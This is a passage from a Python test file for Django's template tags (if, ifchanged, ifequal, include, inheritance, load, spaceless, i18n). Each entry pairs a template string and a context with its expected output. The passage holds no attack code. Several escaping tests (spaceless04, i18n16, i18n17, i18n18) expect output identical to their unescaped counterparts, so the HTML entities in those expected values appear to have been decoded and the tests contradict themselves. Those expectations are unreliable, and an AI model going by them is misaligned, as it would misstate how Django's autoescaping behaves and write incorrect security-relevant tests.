'if-tag-error09': ("{% if or %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error10': ("{% if == %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error11': ("{% if 1 == %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error12': ("{% if a not b %}yes{% endif %}", {}, template.TemplateSyntaxError),
# If evaluations are short-circuited where possible.
# If is_bad is invoked, it raises a ShouldNotExecuteException.
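# (TestObj is defined earlier in this file; roughly, it exposes is_true()
# returning True, is_false() returning False, and is_bad() raising
# ShouldNotExecuteException, so is_bad must never be reached once the
# left-hand operand already decides the expression.)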
'if-tag-shortcircuit01': ('{% if x.is_true or x.is_bad %}yes{% else %}no{% endif %}', {'x': TestObj()}, "yes"),
'if-tag-shortcircuit02': ('{% if x.is_false and x.is_bad %}yes{% else %}no{% endif %}', {'x': TestObj()}, "no"),
# Non-existent args
'if-tag-badarg01':("{% if x|default_if_none:y %}yes{% endif %}", {}, ''),
'if-tag-badarg02':("{% if x|default_if_none:y %}yes{% endif %}", {'y': 0}, ''),
'if-tag-badarg03':("{% if x|default_if_none:y %}yes{% endif %}", {'y': 1}, 'yes'),
'if-tag-badarg04':("{% if x|default_if_none:y %}yes{% else %}no{% endif %}", {}, 'no'),
# Additional, more precise parsing tests are in SmartIfTests
### IFCHANGED TAG #########################################################
'ifchanged01': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% endfor %}', {'num': (1,2,3)}, '123'),
'ifchanged02': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% endfor %}', {'num': (1,1,3)}, '13'),
'ifchanged03': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% endfor %}', {'num': (1,1,1)}, '1'),
'ifchanged04': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', {'num': (1, 2, 3), 'numx': (2, 2, 2)}, '122232'),
'ifchanged05': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', {'num': (1, 1, 1), 'numx': (1, 2, 3)}, '1123123123'),
'ifchanged06': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', {'num': (1, 1, 1), 'numx': (2, 2, 2)}, '1222'),
'ifchanged07': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% for y in numy %}{% ifchanged %}{{ y }}{% endifchanged %}{% endfor %}{% endfor %}{% endfor %}', {'num': (1, 1, 1), 'numx': (2, 2, 2), 'numy': (3, 3, 3)}, '1233323332333'),
'ifchanged08': ('{% for data in datalist %}{% for c,d in data %}{% if c %}{% ifchanged %}{{ d }}{% endifchanged %}{% endif %}{% endfor %}{% endfor %}', {'datalist': [[(1, 'a'), (1, 'a'), (0, 'b'), (1, 'c')], [(0, 'a'), (1, 'c'), (1, 'd'), (1, 'd'), (0, 'e')]]}, 'accd'),
# Test one parameter given to ifchanged.
'ifchanged-param01': ('{% for n in num %}{% ifchanged n %}..{% endifchanged %}{{ n }}{% endfor %}', { 'num': (1,2,3) }, '..1..2..3'),
'ifchanged-param02': ('{% for n in num %}{% for x in numx %}{% ifchanged n %}..{% endifchanged %}{{ x }}{% endfor %}{% endfor %}', { 'num': (1,2,3), 'numx': (5,6,7) }, '..567..567..567'),
# Test multiple parameters to ifchanged.
'ifchanged-param03': ('{% for n in num %}{{ n }}{% for x in numx %}{% ifchanged x n %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', { 'num': (1,1,2), 'numx': (5,6,6) }, '156156256'),
# Test a date+hour like construct, where the hour of the last day
# is the same but the date had changed, so print the hour anyway.
'ifchanged-param04': ('{% for d in days %}{% ifchanged %}{{ d.day }}{% endifchanged %}{% for h in d.hours %}{% ifchanged d h %}{{ h }}{% endifchanged %}{% endfor %}{% endfor %}', {'days':[{'day':1, 'hours':[1,2,3]},{'day':2, 'hours':[3]},] }, '112323'),
# Logically the same as above, just written with explicit
# ifchanged for the day.
'ifchanged-param05': ('{% for d in days %}{% ifchanged d.day %}{{ d.day }}{% endifchanged %}{% for h in d.hours %}{% ifchanged d.day h %}{{ h }}{% endifchanged %}{% endfor %}{% endfor %}', {'days':[{'day':1, 'hours':[1,2,3]},{'day':2, 'hours':[3]},] }, '112323'),
# Test the else clause of ifchanged.
'ifchanged-else01': ('{% for id in ids %}{{ id }}{% ifchanged id %}-first{% else %}-other{% endifchanged %},{% endfor %}', {'ids': [1,1,2,2,2,3]}, '1-first,1-other,2-first,2-other,2-other,3-first,'),
'ifchanged-else02': ('{% for id in ids %}{{ id }}-{% ifchanged id %}{% cycle red,blue %}{% else %}grey{% endifchanged %},{% endfor %}', {'ids': [1,1,2,2,2,3]}, '1-red,1-grey,2-blue,2-grey,2-grey,3-red,'),
'ifchanged-else03': ('{% for id in ids %}{{ id }}{% ifchanged id %}-{% cycle red,blue %}{% else %}{% endifchanged %},{% endfor %}', {'ids': [1,1,2,2,2,3]}, '1-red,1,2-blue,2,2,3-red,'),
'ifchanged-else04': ('{% for id in ids %}{% ifchanged %}***{{ id }}*{% else %}...{% endifchanged %}{{ forloop.counter }}{% endfor %}', {'ids': [1,1,2,2,2,3,4]}, '***1*1...2***2*3...4...5***3*6***4*7'),
### IFEQUAL TAG ###########################################################
'ifequal01': ("{% ifequal a b %}yes{% endifequal %}", {"a": 1, "b": 2}, ""),
'ifequal02': ("{% ifequal a b %}yes{% endifequal %}", {"a": 1, "b": 1}, "yes"),
'ifequal03': ("{% ifequal a b %}yes{% else %}no{% endifequal %}", {"a": 1, "b": 2}, "no"),
'ifequal04': ("{% ifequal a b %}yes{% else %}no{% endifequal %}", {"a": 1, "b": 1}, "yes"),
'ifequal05': ("{% ifequal a 'test' %}yes{% else %}no{% endifequal %}", {"a": "test"}, "yes"),
'ifequal06': ("{% ifequal a 'test' %}yes{% else %}no{% endifequal %}", {"a": "no"}, "no"),
'ifequal07': ('{% ifequal a "test" %}yes{% else %}no{% endifequal %}', {"a": "test"}, "yes"),
'ifequal08': ('{% ifequal a "test" %}yes{% else %}no{% endifequal %}', {"a": "no"}, "no"),
'ifequal09': ('{% ifequal a "test" %}yes{% else %}no{% endifequal %}', {}, "no"),
'ifequal10': ('{% ifequal a b %}yes{% else %}no{% endifequal %}', {}, "yes"),
# SMART SPLITTING
'ifequal-split01': ('{% ifequal a "test man" %}yes{% else %}no{% endifequal %}', {}, "no"),
'ifequal-split02': ('{% ifequal a "test man" %}yes{% else %}no{% endifequal %}', {'a': 'foo'}, "no"),
'ifequal-split03': ('{% ifequal a "test man" %}yes{% else %}no{% endifequal %}', {'a': 'test man'}, "yes"),
'ifequal-split04': ("{% ifequal a 'test man' %}yes{% else %}no{% endifequal %}", {'a': 'test man'}, "yes"),
'ifequal-split05': ("{% ifequal a 'i \"love\" you' %}yes{% else %}no{% endifequal %}", {'a': ''}, "no"),
'ifequal-split06': ("{% ifequal a 'i \"love\" you' %}yes{% else %}no{% endifequal %}", {'a': 'i "love" you'}, "yes"),
'ifequal-split07': ("{% ifequal a 'i \"love\" you' %}yes{% else %}no{% endifequal %}", {'a': 'i love you'}, "no"),
'ifequal-split08': (r"{% ifequal a 'I\'m happy' %}yes{% else %}no{% endifequal %}", {'a': "I'm happy"}, "yes"),
'ifequal-split09': (r"{% ifequal a 'slash\man' %}yes{% else %}no{% endifequal %}", {'a': r"slash\man"}, "yes"),
'ifequal-split10': (r"{% ifequal a 'slash\man' %}yes{% else %}no{% endifequal %}", {'a': r"slashman"}, "no"),
# NUMERIC RESOLUTION
'ifequal-numeric01': ('{% ifequal x 5 %}yes{% endifequal %}', {'x': '5'}, ''),
'ifequal-numeric02': ('{% ifequal x 5 %}yes{% endifequal %}', {'x': 5}, 'yes'),
'ifequal-numeric03': ('{% ifequal x 5.2 %}yes{% endifequal %}', {'x': 5}, ''),
'ifequal-numeric04': ('{% ifequal x 5.2 %}yes{% endifequal %}', {'x': 5.2}, 'yes'),
'ifequal-numeric05': ('{% ifequal x 0.2 %}yes{% endifequal %}', {'x': .2}, 'yes'),
'ifequal-numeric06': ('{% ifequal x .2 %}yes{% endifequal %}', {'x': .2}, 'yes'),
'ifequal-numeric07': ('{% ifequal x 2. %}yes{% endifequal %}', {'x': 2}, ''),
'ifequal-numeric08': ('{% ifequal x "5" %}yes{% endifequal %}', {'x': 5}, ''),
'ifequal-numeric09': ('{% ifequal x "5" %}yes{% endifequal %}', {'x': '5'}, 'yes'),
'ifequal-numeric10': ('{% ifequal x -5 %}yes{% endifequal %}', {'x': -5}, 'yes'),
'ifequal-numeric11': ('{% ifequal x -5.2 %}yes{% endifequal %}', {'x': -5.2}, 'yes'),
'ifequal-numeric12': ('{% ifequal x +5 %}yes{% endifequal %}', {'x': 5}, 'yes'),
# FILTER EXPRESSIONS AS ARGUMENTS
'ifequal-filter01': ('{% ifequal a|upper "A" %}x{% endifequal %}', {'a': 'a'}, 'x'),
'ifequal-filter02': ('{% ifequal "A" a|upper %}x{% endifequal %}', {'a': 'a'}, 'x'),
'ifequal-filter03': ('{% ifequal a|upper b|upper %}x{% endifequal %}', {'a': 'x', 'b': 'X'}, 'x'),
'ifequal-filter04': ('{% ifequal x|slice:"1" "a" %}x{% endifequal %}', {'x': 'aaa'}, 'x'),
'ifequal-filter05': ('{% ifequal x|slice:"1"|upper "A" %}x{% endifequal %}', {'x': 'aaa'}, 'x'),
### IFNOTEQUAL TAG ########################################################
'ifnotequal01': ("{% ifnotequal a b %}yes{% endifnotequal %}", {"a": 1, "b": 2}, "yes"),
'ifnotequal02': ("{% ifnotequal a b %}yes{% endifnotequal %}", {"a": 1, "b": 1}, ""),
'ifnotequal03': ("{% ifnotequal a b %}yes{% else %}no{% endifnotequal %}", {"a": 1, "b": 2}, "yes"),
'ifnotequal04': ("{% ifnotequal a b %}yes{% else %}no{% endifnotequal %}", {"a": 1, "b": 1}, "no"),
## INCLUDE TAG ###########################################################
'include01': ('{% include "basic-syntax01" %}', {}, "something cool"),
'include02': ('{% include "basic-syntax02" %}', {'headline': 'Included'}, "Included"),
'include03': ('{% include template_name %}', {'template_name': 'basic-syntax02', 'headline': 'Included'}, "Included"),
'include04': ('a{% include "nonexistent" %}b', {}, ("ab", "ab", template.TemplateDoesNotExist)),
'include 05': ('template with a space', {}, 'template with a space'),
'include06': ('{% include "include 05"%}', {}, 'template with a space'),
# extra inline context
'include07': ('{% include "basic-syntax02" with headline="Inline" %}', {'headline': 'Included'}, 'Inline'),
'include08': ('{% include headline with headline="Dynamic" %}', {'headline': 'basic-syntax02'}, 'Dynamic'),
'include09': ('{{ first }}--{% include "basic-syntax03" with first=second|lower|upper second=first|upper %}--{{ second }}', {'first': 'Ul', 'second': 'lU'}, 'Ul--LU --- UL--lU'),
# isolated context
'include10': ('{% include "basic-syntax03" only %}', {'first': '1'}, (' --- ', 'INVALID --- INVALID')),
'include11': ('{% include "basic-syntax03" only with second=2 %}', {'first': '1'}, (' --- 2', 'INVALID --- 2')),
'include12': ('{% include "basic-syntax03" with first=1 only %}', {'second': '2'}, ('1 --- ', '1 --- INVALID')),
# autoescape context
'include13': ('{% autoescape off %}{% include "basic-syntax03" %}{% endautoescape %}', {'first': '&'}, ('& --- ', '& --- INVALID')),
'include14': ('{% autoescape off %}{% include "basic-syntax03" with first=var1 only %}{% endautoescape %}', {'var1': '&'}, ('& --- ', '& --- INVALID')),
'include-error01': ('{% include "basic-syntax01" with %}', {}, template.TemplateSyntaxError),
'include-error02': ('{% include "basic-syntax01" with "no key" %}', {}, template.TemplateSyntaxError),
'include-error03': ('{% include "basic-syntax01" with dotted.arg="error" %}', {}, template.TemplateSyntaxError),
'include-error04': ('{% include "basic-syntax01" something_random %}', {}, template.TemplateSyntaxError),
'include-error05': ('{% include "basic-syntax01" foo="duplicate" foo="key" %}', {}, template.TemplateSyntaxError),
'include-error06': ('{% include "basic-syntax01" only only %}', {}, template.TemplateSyntaxError),
### INCLUSION ERROR REPORTING #############################################
'include-fail1': ('{% load bad_tag %}{% badtag %}', {}, RuntimeError),
'include-fail2': ('{% load broken_tag %}', {}, template.TemplateSyntaxError),
'include-error07': ('{% include "include-fail1" %}', {}, ('', '', RuntimeError)),
'include-error08': ('{% include "include-fail2" %}', {}, ('', '', template.TemplateSyntaxError)),
'include-error09': ('{% include failed_include %}', {'failed_include': 'include-fail1'}, ('', '', RuntimeError)),
'include-error10': ('{% include failed_include %}', {'failed_include': 'include-fail2'}, ('', '', template.TemplateSyntaxError)),
### NAMED ENDBLOCKS #######################################################
# Basic test
'namedendblocks01': ("1{% block first %}_{% block second %}2{% endblock second %}_{% endblock first %}3", {}, '1_2_3'),
# Unbalanced blocks
'namedendblocks02': ("1{% block first %}_{% block second %}2{% endblock first %}_{% endblock second %}3", {}, template.TemplateSyntaxError),
'namedendblocks03': ("1{% block first %}_{% block second %}2{% endblock %}_{% endblock second %}3", {}, template.TemplateSyntaxError),
'namedendblocks04': ("1{% block first %}_{% block second %}2{% endblock second %}_{% endblock third %}3", {}, template.TemplateSyntaxError),
'namedendblocks05': ("1{% block first %}_{% block second %}2{% endblock first %}", {}, template.TemplateSyntaxError),
# Mixed named and unnamed endblocks
'namedendblocks06': ("1{% block first %}_{% block second %}2{% endblock %}_{% endblock first %}3", {}, '1_2_3'),
'namedendblocks07': ("1{% block first %}_{% block second %}2{% endblock second %}_{% endblock %}3", {}, '1_2_3'),
### INHERITANCE ###########################################################
# Standard template with no inheritance
'inheritance01': ("1{% block first %}&{% endblock %}3{% block second %}_{% endblock %}", {}, '1&3_'),
# Standard two-level inheritance
'inheritance02': ("{% extends 'inheritance01' %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {}, '1234'),
# Three-level with no redefinitions on third level
'inheritance03': ("{% extends 'inheritance02' %}", {}, '1234'),
# Two-level with no redefinitions on second level
'inheritance04': ("{% extends 'inheritance01' %}", {}, '1&3_'),
# Two-level with double quotes instead of single quotes
'inheritance05': ('{% extends "inheritance02" %}', {}, '1234'),
# Three-level with variable parent-template name
'inheritance06': ("{% extends foo %}", {'foo': 'inheritance02'}, '1234'),
# Two-level with one block defined, one block not defined
'inheritance07': ("{% extends 'inheritance01' %}{% block second %}5{% endblock %}", {}, '1&35'),
# Three-level with one block defined on this level, two blocks defined next level
'inheritance08': ("{% extends 'inheritance02' %}{% block second %}5{% endblock %}", {}, '1235'),
# Three-level with second and third levels blank
'inheritance09': ("{% extends 'inheritance04' %}", {}, '1&3_'),
# Three-level with space NOT in a block -- should be ignored
'inheritance10': ("{% extends 'inheritance04' %} ", {}, '1&3_'),
# Three-level with both blocks defined on this level, but none on second level
'inheritance11': ("{% extends 'inheritance04' %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {}, '1234'),
# Three-level with this level providing one and second level providing the other
'inheritance12': ("{% extends 'inheritance07' %}{% block first %}2{% endblock %}", {}, '1235'),
# Three-level with this level overriding second level
'inheritance13': ("{% extends 'inheritance02' %}{% block first %}a{% endblock %}{% block second %}b{% endblock %}", {}, '1a3b'),
# A block defined only in a child template shouldn't be displayed
'inheritance14': ("{% extends 'inheritance01' %}{% block newblock %}NO DISPLAY{% endblock %}", {}, '1&3_'),
# A block within another block
'inheritance15': ("{% extends 'inheritance01' %}{% block first %}2{% block inner %}inner{% endblock %}{% endblock %}", {}, '12inner3_'),
# A block within another block (level 2)
'inheritance16': ("{% extends 'inheritance15' %}{% block inner %}out{% endblock %}", {}, '12out3_'),
# {% load %} tag (parent -- setup for exception04)
'inheritance17': ("{% load testtags %}{% block first %}1234{% endblock %}", {}, '1234'),
# {% load %} tag (standard usage, without inheritance)
'inheritance18': ("{% load testtags %}{% echo this that theother %}5678", {}, 'this that theother5678'),
# {% load %} tag (within a child template)
'inheritance19': ("{% extends 'inheritance01' %}{% block first %}{% load testtags %}{% echo 400 %}5678{% endblock %}", {}, '140056783_'),
# Two-level inheritance with {{ block.super }}
'inheritance20': ("{% extends 'inheritance01' %}{% block first %}{{ block.super }}a{% endblock %}", {}, '1&a3_'),
# Three-level inheritance with {{ block.super }} from parent
'inheritance21': ("{% extends 'inheritance02' %}{% block first %}{{ block.super }}a{% endblock %}", {}, '12a34'),
# Three-level inheritance with {{ block.super }} from grandparent
'inheritance22': ("{% extends 'inheritance04' %}{% block first %}{{ block.super }}a{% endblock %}", {}, '1&a3_'),
# Three-level inheritance with {{ block.super }} from parent and grandparent
'inheritance23': ("{% extends 'inheritance20' %}{% block first %}{{ block.super }}b{% endblock %}", {}, '1&ab3_'),
# Inheritance from local context without use of template loader
'inheritance24': ("{% extends context_template %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {'context_template': template.Template("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")}, '1234'),
# Inheritance from local context with variable parent template
'inheritance25': ("{% extends context_template.1 %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {'context_template': [template.Template("Wrong"), template.Template("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")]}, '1234'),
# Set up a base template to extend
'inheritance26': ("no tags", {}, 'no tags'),
# Inheritance from a template that doesn't have any blocks
'inheritance27': ("{% extends 'inheritance26' %}", {}, 'no tags'),
# Set up a base template with a space in it.
'inheritance 28': ("{% block first %}!{% endblock %}", {}, '!'),
# Inheritance from a template with a space in its name should work.
'inheritance29': ("{% extends 'inheritance 28' %}", {}, '!'),
# Base template, putting block in a conditional {% if %} tag
'inheritance30': ("1{% if optional %}{% block opt %}2{% endblock %}{% endif %}3", {'optional': True}, '123'),
# Inherit from a template with block wrapped in an {% if %} tag (in parent), still gets overridden
'inheritance31': ("{% extends 'inheritance30' %}{% block opt %}two{% endblock %}", {'optional': True}, '1two3'),
'inheritance32': ("{% extends 'inheritance30' %}{% block opt %}two{% endblock %}", {}, '13'),
# Base template, putting block in a conditional {% ifequal %} tag
'inheritance33': ("1{% ifequal optional 1 %}{% block opt %}2{% endblock %}{% endifequal %}3", {'optional': 1}, '123'),
# Inherit from a template with block wrapped in an {% ifequal %} tag (in parent), still gets overridden
'inheritance34': ("{% extends 'inheritance33' %}{% block opt %}two{% endblock %}", {'optional': 1}, '1two3'),
'inheritance35': ("{% extends 'inheritance33' %}{% block opt %}two{% endblock %}", {'optional': 2}, '13'),
# Base template, putting block in a {% for %} tag
'inheritance36': ("{% for n in numbers %}_{% block opt %}{{ n }}{% endblock %}{% endfor %}_", {'numbers': '123'}, '_1_2_3_'),
# Inherit from a template with block wrapped in a {% for %} tag (in parent), still gets overridden
'inheritance37': ("{% extends 'inheritance36' %}{% block opt %}X{% endblock %}", {'numbers': '123'}, '_X_X_X_'),
'inheritance38': ("{% extends 'inheritance36' %}{% block opt %}X{% endblock %}", {}, '_'),
# The super block will still be found.
'inheritance39': ("{% extends 'inheritance30' %}{% block opt %}new{{ block.super }}{% endblock %}", {'optional': True}, '1new23'),
'inheritance40': ("{% extends 'inheritance33' %}{% block opt %}new{{ block.super }}{% endblock %}", {'optional': 1}, '1new23'),
'inheritance41': ("{% extends 'inheritance36' %}{% block opt %}new{{ block.super }}{% endblock %}", {'numbers': '123'}, '_new1_new2_new3_'),
# Expression starting and ending with a quote
'inheritance42': ("{% extends 'inheritance02'|cut:' ' %}", {}, '1234'),
### LOADING TAG LIBRARIES #################################################
'load01': ("{% load testtags subpackage.echo %}{% echo test %} {% echo2 \"test\" %}", {}, "test test"),
'load02': ("{% load subpackage.echo %}{% echo2 \"test\" %}", {}, "test"),
# {% load %} tag, importing individual tags
'load03': ("{% load echo from testtags %}{% echo this that theother %}", {}, 'this that theother'),
'load04': ("{% load echo other_echo from testtags %}{% echo this that theother %} {% other_echo and another thing %}", {}, 'this that theother and another thing'),
'load05': ("{% load echo upper from testtags %}{% echo this that theother %} {{ statement|upper }}", {'statement': 'not shouting'}, 'this that theother NOT SHOUTING'),
'load06': ("{% load echo2 from subpackage.echo %}{% echo2 \"test\" %}", {}, "test"),
# {% load %} tag errors
'load07': ("{% load echo other_echo bad_tag from testtags %}", {}, template.TemplateSyntaxError),
'load08': ("{% load echo other_echo bad_tag from %}", {}, template.TemplateSyntaxError),
'load09': ("{% load from testtags %}", {}, template.TemplateSyntaxError),
'load10': ("{% load echo from bad_library %}", {}, template.TemplateSyntaxError),
'load11': ("{% load subpackage.echo_invalid %}", {}, template.TemplateSyntaxError),
'load12': ("{% load subpackage.missing %}", {}, template.TemplateSyntaxError),
### SPACELESS TAG #########################################################
# {% spaceless %} tag
'spaceless01': ("{% spaceless %} <b> <i> text </i> </b> {% endspaceless %}", {}, "<b><i> text </i></b>"),
'spaceless02': ("{% spaceless %} <b> \n <i> text </i> \n </b> {% endspaceless %}", {}, "<b><i> text </i></b>"),
'spaceless03': ("{% spaceless %}<b><i>text</i></b>{% endspaceless %}", {}, "<b><i>text</i></b>"),
'spaceless04': ("{% spaceless %}<b> <i>{{ text }}</i> </b>{% endspaceless %}", {'text' : 'This & that'}, "<b><i>This & that</i></b>"),
'spaceless05': ("{% autoescape off %}{% spaceless %}<b> <i>{{ text }}</i> </b>{% endspaceless %}{% endautoescape %}", {'text' : 'This & that'}, "<b><i>This & that</i></b>"),
'spaceless06': ("{% spaceless %}<b> <i>{{ text|safe }}</i> </b>{% endspaceless %}", {'text' : 'This & that'}, "<b><i>This & that</i></b>"),
### I18N ##################################################################
# simple translation of a string delimited by '
'i18n01': ("{% load i18n %}{% trans 'xxxyyyxxx' %}", {}, "xxxyyyxxx"),
# simple translation of a string delimited by "
'i18n02': ('{% load i18n %}{% trans "xxxyyyxxx" %}', {}, "xxxyyyxxx"),
# simple translation of a variable
'i18n03': ('{% load i18n %}{% blocktrans %}{{ anton }}{% endblocktrans %}', {'anton': b'\xc3\x85'}, "Å"),
# simple translation of a variable and filter
'i18n04': ('{% load i18n %}{% blocktrans with berta=anton|lower %}{{ berta }}{% endblocktrans %}', {'anton': b'\xc3\x85'}, 'å'),
'legacyi18n04': ('{% load i18n %}{% blocktrans with anton|lower as berta %}{{ berta }}{% endblocktrans %}', {'anton': b'\xc3\x85'}, 'å'),
# simple translation of a string with interpolation
'i18n05': ('{% load i18n %}{% blocktrans %}xxx{{ anton }}xxx{% endblocktrans %}', {'anton': 'yyy'}, "xxxyyyxxx"),
# simple translation of a string to german
'i18n06': ('{% load i18n %}{% trans "Page not found" %}', {'LANGUAGE_CODE': 'de'}, "Seite nicht gefunden"),
# translation of singular form
'i18n07': ('{% load i18n %}{% blocktrans count counter=number %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 1}, "singular"),
'legacyi18n07': ('{% load i18n %}{% blocktrans count number as counter %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 1}, "singular"),
# translation of plural form
'i18n08': ('{% load i18n %}{% blocktrans count counter=number %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 2}, "2 plural"),
'legacyi18n08': ('{% load i18n %}{% blocktrans count number as counter %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 2}, "2 plural"),
# simple non-translation (only marking) of a string to german
'i18n09': ('{% load i18n %}{% trans "Page not found" noop %}', {'LANGUAGE_CODE': 'de'}, "Page not found"),
# translation of a variable with a translated filter
'i18n10': ('{{ bool|yesno:_("yes,no,maybe") }}', {'bool': True, 'LANGUAGE_CODE': 'de'}, 'Ja'),
# translation of a variable with a non-translated filter
'i18n11': ('{{ bool|yesno:"ja,nein" }}', {'bool': True}, 'ja'),
# usage of the get_available_languages tag
'i18n12': ('{% load i18n %}{% get_available_languages as langs %}{% for lang in langs %}{% ifequal lang.0 "de" %}{{ lang.0 }}{% endifequal %}{% endfor %}', {}, 'de'),
# translation of constant strings
'i18n13': ('{{ _("Password") }}', {'LANGUAGE_CODE': 'de'}, 'Passwort'),
'i18n14': ('{% cycle "foo" _("Password") _(\'Password\') as c %} {% cycle c %} {% cycle c %}', {'LANGUAGE_CODE': 'de'}, 'foo Passwort Passwort'),
'i18n15': ('{{ absent|default:_("Password") }}', {'LANGUAGE_CODE': 'de', 'absent': ""}, 'Passwort'),
'i18n16': ('{{ _("<") }}', {'LANGUAGE_CODE': 'de'}, '<'),
# Escaping inside blocktrans and trans works as if it was directly in the
# template.
'i18n17': ('{% load i18n %}{% blocktrans with berta=anton|escape %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
'i18n18': ('{% load i18n %}{% blocktrans with berta=anton|force_escape %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
'i18n19': ('{% load i18n %}{% blocktrans %}{{ andrew }}{% endblocktrans %}', {'andrew': 'a & b'}, 'a & b'),
'i18n20': ('{% load i18n %}{% trans andrew %}', {'andrew': 'a & b'}, 'a & b'),
'i18n21': ('{% load i18n %}{% blocktrans %}{{ andrew }}{% endblocktrans %}', {'andrew': mark_safe('a & b')}, 'a & b'),
'i18n22': ('{% load i18n %}{% trans andrew %}', {'andrew': mark_safe('a & b')}, 'a & b'),
'legacyi18n17': ('{% load i18n %}{% blocktrans with anton|escape as berta %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
'legacyi18n18': ('{% load i18n %}{% blocktrans with anton|force_escape as berta %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
# Use filters with the {% trans %} tag, #5972
'i18n23': ('{% load i18n %}{% trans "Page not found"|capfirst|slice:"6:" %}', {'LANGUAGE_CODE': 'de'}, 'nicht gefunden'),
'i18n24': ("{% load i18n %}{% trans 'Page not found'|upper %}", {'LANGUAGE_CODE': 'de'}, 'SEITE NICHT GEFUNDEN'),
'i18n25': ('{% load i18n %}{% trans somevar|upper %}', {'somevar': 'Page not found', 'LANGUAGE_CODE': 'de'}, 'SEITE NICHT GEFUNDEN'),
# translation of plural form with extra field in singular form (#13568)
'i18n26': ('{% load i18n %}{% blocktrans with extra_field=myextra_field count counter=number %}singular {{ extra_field }}{% plural %}plural{% endblocktrans %}', {'number': 1, 'myextra_field': 'test'}, "singular test"),
'legacyi18n26': ('{% load i18n %}{% blocktrans with myextra_field as extra_field count number as counter %}singular {{ extra_field }}{% plural %}plural{% endblocktrans %}', {'number': 1, 'myextra_field': 'test'}, "singular test"),
# translation of singular form in russian (#14126)
'i18n27': ('{% load i18n %}{% blocktrans count counter=number %}{{ counter }} result{% plural %}{{ counter }} results{% endblocktrans %}', {'number': 1, 'LANGUAGE_CODE': 'ru'}, '1 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442'),
'legacyi18n27': ('{% load i18n %}{% blocktrans count number as counter %}{{ counter }} result{% plural %}{{ counter }} results{% endblocktrans %}', {'number': 1, 'LANGUAGE_CODE': 'ru'}, '1 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442'),
# simple translation of multiple variables
'i18n28': ('{% load i18n %}{% blocktrans with a=anton b=berta %}{{ a }} + {{ b }}{% endblocktrans %}', {'anton': 'α', 'berta': 'β'}, 'α + β'),
'legacyi18n28': ('{% load i18n %}{% blocktrans with anton as a and berta as b %}{{ a }} + {{ b }}{% endblocktrans %}', {'anton': 'α', 'berta': 'β'}, 'α + β'),
# retrieving language information
'i18n28_2': ('{% load i18n %}{% get_language_info for "de" as l %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}', {}, 'de: German/Deutsch bidi=False'),
'i18n29': ('{% load i18n %}{% get_language_info for LANGUAGE_CODE as l %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}', {'LANGUAGE_CODE': 'fi'}, 'fi: Finnish/suomi bidi=False'),
'i18n30': ('{% load i18n %}{% get_language_info_list for langcodes as langs %}{% for l in langs %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}; {% endfor %}', {'langcodes': ['it', 'no']}, 'it: Italian/italiano bidi=False; no: Norwegian/Norsk bidi=False; '),
'i18n31': ('{% load i18n %}{% get_language_info_list for langcodes as langs %}{% for l in langs %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}; {% endfor %}', {'langcodes': (('sl', 'Slovenian'), ('fa', 'Persian'))}, 'sl: Slovenian/Sloven\u0161\u010dina bidi=False; fa: Persian/\u0641\u0627\u0631\u0633\u06cc bidi=True; '),
'i18n32': ('{% load i18n %}{{ "hu"|language_name }} {{ "hu"|language_name_local }} {{ "hu"|language_bidi }}', {}, 'Hungarian Magyar False'),
'i18n33': ('{% load i18n %}{{ langcode|language_name }} {{ langcode|language_name_local }} {{ langcode|language_bidi }}', {'langcode': 'nl'}, 'Dutch Nederlands False'),
# blocktrans handling of variables which are not in the context.
'i18n34': ('{% load i18n %}{% blocktrans %}{{ missing }}{% endblocktrans %}', {}, ''),
# trans tag with as var
'i18n35': ('{% load i18n %}{% trans "Page not found" as page_not_found %}{{ page_not_found }}', {'LANGUAGE_CODE': 'de'}, "Seite nicht gefunden"),
'i18n36': ('{% load i18n %}{% trans "Page not found" noop as page_not_found %}{{ page_not_found }}', {'LANGUAGE_CODE': 'de'}, "Page not found"),
'i18n36b': ('{% load i18n %}{% trans "Page not found" as page_not_found noop %}{{ page_not_found }}', {'LANGUAGE_CODE': 'de'}, "Page not found"),
'i18n37': ('{% load i18n %}{% trans "Page not found" as page_not_found %}{% blocktrans %}Error: {{ page_not_found }}{% endblocktrans %}', {'LANGUAGE_CODE': 'de'}, "Error: Seite nicht gefunden"),
### HANDLING OF TEMPLATE_STRING_IF_INVALID ###################################
